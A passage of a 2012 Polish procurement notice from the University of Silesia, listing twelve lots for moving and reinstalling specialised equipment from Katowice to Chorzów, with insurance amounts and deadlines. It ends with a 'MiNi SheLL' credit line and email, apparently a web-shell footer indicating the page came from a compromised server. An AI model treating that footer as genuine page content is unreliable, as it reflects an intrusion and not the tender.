3) konieczności przesunięcia terminu, na jaki została zawarta umowa, a także terminów umownych, jeżeli konieczność ta nastąpiła na skutek okoliczności leżących po stronie Zamawiającego, 
4) ewentualnej zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę, na realizację z udziałem podwykonawców,  
5) ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania umowy. Wartość umowy o której mowa w § 4 ust. 1 umowy nie ulegnie zwiększeniu,
6) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Uniwersytetu Śląskiego, Katowice, ul. Bankowa 12, III piętro, pok. 69,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2012 godzina 10:30, miejsce: Dział Zamówień Publicznych Uniwersytetu Śląskiego, Katowice, ul. Bankowa 12, III piętro, pok. 69,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część A: Demontaż, przeniesienie oraz ponowny montaż sprzętu/urządzeń zgodnie z załącznikiem nr 2A do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2A do SIWZ stanowiący Opis przedmiotu zamówienia.
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 2 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 powyżej na sumę gwarancyjną co najmniej: 500.000,00 PLN,
na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 500.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część B: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie z załącznikiem nr 2B do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2B do SIWZ stanowiącye Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 20.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 20.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część C: Demontaż oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2B do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 6 tygodni od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 700.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część D: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2B do SIWZ stanowiący Opis przedmiotu zamówienia.
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 3 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 100.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 100.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> część E: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2B do SIWZ stanowiący Opis przedmiotu zamówienia/
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 5 tygodni od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 1.200.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 1.200.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> część F: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2B do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w części F zostanie zawarta na czas nie dłuższy niż 4 miesiące.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 850.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 850.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> część G: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2B do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 6 miesięcy.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 80.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 80.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> część H: Demontaż oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2B do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2B do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 900.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> część I: Demontaż  oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik 2C do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 550.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> część J: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik C do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 24 na sumę gwarancyjną co najmniej 500.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 500.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> część K: Demontaż oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2C do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 1.130.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> część L: Demontaż, przeniesienie oraz montaż sprzętu specjalistycznego zgodnie
z załącznikiem nr 2C do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa w zakresie przeniesienia sprzętu specjalistycznego oraz urządzeń, z Katowic do Chorzowa oraz ich demontażu, ponownego montażu, przyłączenia i uruchomienia, której szczegółowy opis zawiera załącznik nr 2C do SIWZ stanowiący Opis przedmiotu zamówienia. 
2. Wymagany termin i sposób realizacji zamówienia: umowa w danej części zostanie zawarta na czas nie dłuższy niż 4 miesiące, przy czym maksymalny czas wykonania danej usługi wynosi 4 tygodnie od daty powiadomienia Wykonawcy o gotowości Zamawiającego.
3. Wykonawca, w ramach realizacji przedmiotu zamówienia zobowiązany będzie do:
1) zawarcia polisy ubezpieczenia odpowiedzialności cywilnej deliktowej i kontraktowej z tytułu prowadzonej działalności z zakresem ubezpieczenia zgodnym z przedmiotem zamówienia na okres realizacji umowy, o którym mowa w pkt 2 na sumę gwarancyjną co najmniej 5.000.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia. 
2) ubezpieczenia  sprzętu na czas jego transportu z jego dotychczasowego miejsca lokalizacji w miejsce nowej lokalizacji na rzecz Zamawiającego na zasadach ubezpieczenia ładunku w transporcie krajowym w pełnym zakresie, tj. z ryzykiem kradzieży i rabunku wraz z rozszerzeniem o ryzyko załadunku i rozładunku na kwotę co najmniej 5.000.000,00 PLN.
4. W ramach wszystkich części Zamawiający wymaga, aby Wykonawca udzielił gwarancji, nie krótszej niż 3 miesiące obejmującej wykonany montaż oraz uruchomienie sprzętu. Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com